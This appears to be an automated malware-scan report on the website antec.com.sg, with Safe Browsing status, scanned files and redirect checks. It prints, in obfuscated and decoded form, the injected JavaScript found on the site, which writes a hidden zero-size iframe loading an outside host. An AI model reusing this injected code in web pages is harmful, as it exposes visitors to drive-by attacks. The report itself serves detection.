Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=antec.com.sg
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://antec.com.sg/ | 200 OK Content-Length: 12337 Content-Type: text/html | malicious |
Malicious code - confirmed by antiviruses (see below) c10z2c='';ya69a083=document;ya69a083.write('<scr'+'ipt>function y5798a(y9cbc090045b){return ev'+c10z2c+'al(y9cbc090045b); }</scr'+'ipt>'); function c10b010268y4e541d(y60cdb397240){ var z51='';return (y5798a('p'+z51+'arseInt')(y60cdb397240,16));}function y4c6aa623(y1317db22840){ function yd88e1(){var ydded473c2d5=2;return ydded473c2d5;} var y3714ca1b='';y1557e5cdc4='fromCh';ya23c3270da=String[y1557e5cdc4+'arCode'];for(y48150e0=0;y48150e0<y1317db22840.length;y48150e0+=yd88e1()){ y Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://smkapkangar.bpi.edu.my/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://smkapkangar.bpi.edu.my/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://smkapkangar.bpi.edu.my/index.php"></ifee> Antivirus reports:
| ||
http://antec.com.sg/test404page.js | 404 Not Found Content-Length: 768 Content-Type: text/html | suspicious |
Suspicious code. Script contains iFrame. eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('1 k=" i=\\"0\\" g=\\"0\\" j=\\"0\\" f=\\"c://d.h.n.l/o.m\\">";1 5="<8";1 7="p";1 4="e";1 b="</8";1 a="e>";2.3(5);9(2.3(7+4+k+b),6);9(2.3(4+a),6);',26,26,'|var|document|write|k02|k0|1000|k01|if|setTimeout|k22|k2|http|smkapkangar||src|height|bpi|width|board||my|php|edu|index|ram'.split('|'),0,{})) Decoded script: var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://smkapkangar.bpi.edu.my/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); var k=" width=\"0\" height=\"0\" board=\"0\" src=\"http://smkapkangar.bpi.edu.my/index.php\">";var k0="<if";var k01="ram";var k02="e";var k2="</if";var k22="e>";document.write(k0);setTimeout(document.write(k01+k02+k+k2),1000);setTimeout(document.write(k02+k22),1000); undefined /*** called setTimeout with undefined, 1000 */ undefined /*** called setTimeout with undefined, 1000 */ <iframe width="0" height="0" board="0" src="http://smkapkangar.bpi.edu.my/index.php"></ifee> |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: antec.com.sg
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 00:50:42 GMT
Accept-Ranges: bytes
ETag: "1de2385-3031-5488e672"
Server: Apache
Content-Length: 12337
Content-Type: text/html
Last-Modified: Thu, 11 Dec 2014 00:33:54 GMT
...12337 bytes of data.
GET / HTTP/1.1
Host: antec.com.sg
Result:
HTTP/1.1 200 OK
Connection: close
Date: Fri, 09 Jan 2015 00:50:42 GMT
Accept-Ranges: bytes
ETag: "1de2385-3031-5488e672"
Server: Apache
Content-Length: 12337
Content-Type: text/html
Last-Modified: Thu, 11 Dec 2014 00:33:54 GMT
...12337 bytes of data.
Second query (visit from search engine):
GET / HTTP/1.1
Host: antec.com.sg
Referer: http://www.google.com/search?q=antec.com.sg
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: antec.com.sg
Referer: http://www.google.com/search?q=antec.com.sg
Result:
The result is similar to the first query. There are no suspicious redirects found.